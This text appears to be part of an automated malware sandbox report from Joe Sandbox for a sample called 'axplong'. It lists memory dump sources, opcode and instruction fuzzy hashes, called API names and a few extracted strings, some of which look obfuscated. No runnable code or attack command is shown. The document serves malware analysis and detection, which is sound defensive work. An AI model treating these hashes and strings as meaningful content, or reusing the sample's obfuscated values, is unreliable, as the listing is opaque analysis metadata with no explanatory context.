                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b0d5d9bc37be452d6009d196a89432fb8ffb707a034e9d414473a62c83968467
                      • Instruction ID: c73dcefdf600b248b48f80a270c9d3b6862e2aa770d4e48107c74601f8dd5210
                      • Opcode Fuzzy Hash: b0d5d9bc37be452d6009d196a89432fb8ffb707a034e9d414473a62c83968467
                      • Instruction Fuzzy Hash: E2117723F30C255B675C816D8C172BAA5D2DBD825471F533AD826EB284E994DE23D290
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 631a6efb7602800e91766b995f0abb30b3e123fa2f215c67422f066ba0599343
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: D2112B7BA0014147D6048A3DD9F46B6A796EBC63F1B3C437ED1414B758DE22E947F900
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01fd83bdd676a084e6e7f31687b41de31779561b258724154855a43794de7146
                      • Instruction ID: 8d5c010560c65fcf58d6b37dad88b927038b0b67f66c2d9ff8b1b19c411c460a
                      • Opcode Fuzzy Hash: 01fd83bdd676a084e6e7f31687b41de31779561b258724154855a43794de7146
                      • Instruction Fuzzy Hash: E3E08C31240A086FDF35BB14CC1CD993B6AEB52352F514800FD248B222CF69ED8AEA80
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 1099ac372eace6936b0bf3a93634426f1fc8a8e9214fcc40308b31b87ab20a07
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 3CE08C32911628EBCB15DBC8C904D8AF7ECEB48B11F154196FA01E3240C274DF04DBD0
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: 84ef601bbc194b48ae938e8b0242893cde9e71a83f2f5ff134eb2ecb907ec116
                      • Instruction ID: 9ef04b641695f34ad5685a7215b633a936cbc8133554f3c96b4b449238ea3468
                      • Opcode Fuzzy Hash: 84ef601bbc194b48ae938e8b0242893cde9e71a83f2f5ff134eb2ecb907ec116
                      • Instruction Fuzzy Hash: 9802C471D00248EFEF14EFA8CC45BDEBBB5EF05314F544158E805A7282D779AA84DBA2
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: e2bb16f9a1a17b54e9ad4280a957b1e836af5858f7e1757bd346bd453d5d1720
                      • Instruction ID: e8bb70cf81b29499b6e4c5f3c973c6ca901278e4a7e5bbda3488079f8a8d8c96
                      • Opcode Fuzzy Hash: e2bb16f9a1a17b54e9ad4280a957b1e836af5858f7e1757bd346bd453d5d1720
                      • Instruction Fuzzy Hash: B5A1C0B1E00225AFDB11DF64DD45BAAB7B8FF15324F044129E815E7241EB39EA04EBD1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 305cc73ea24d0e111077ead8a2d1136b0941306643f0ab8277500dd4a8ef0c3f
                      • Instruction ID: 21e36ccd629ab0551d3d4794a4475728430c615e96fffd8561d692e25a0645cc
                      • Opcode Fuzzy Hash: 305cc73ea24d0e111077ead8a2d1136b0941306643f0ab8277500dd4a8ef0c3f
                      • Instruction Fuzzy Hash: 3101FE77E0CB162666187419BC0363B27989B82BB6715402BFF44F73C1DF48DC467591
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 44d00dc7cde9e1c01eff40102b1627e9b075a3020976e769d88e6b376af58d6e
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 37B13632D003859FDB11CF28C8517AEBBE5EF55351F1441AADE46DB242D6388D4ADB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: a7cb8954c1ec7b5de5cb8f25d370b46a410abf94e934ae7e8aa832a6a6ba44f4
                      • Instruction ID: 730ba4e2581208371287229a757ce6445ae665058da70b884a06ff7894211cae
                      • Opcode Fuzzy Hash: a7cb8954c1ec7b5de5cb8f25d370b46a410abf94e934ae7e8aa832a6a6ba44f4
                      • Instruction Fuzzy Hash: 86212F76E01219AFDF10EFA4DC419BEBBB8EF48724F100065FA01B7251DB34AD41ABA1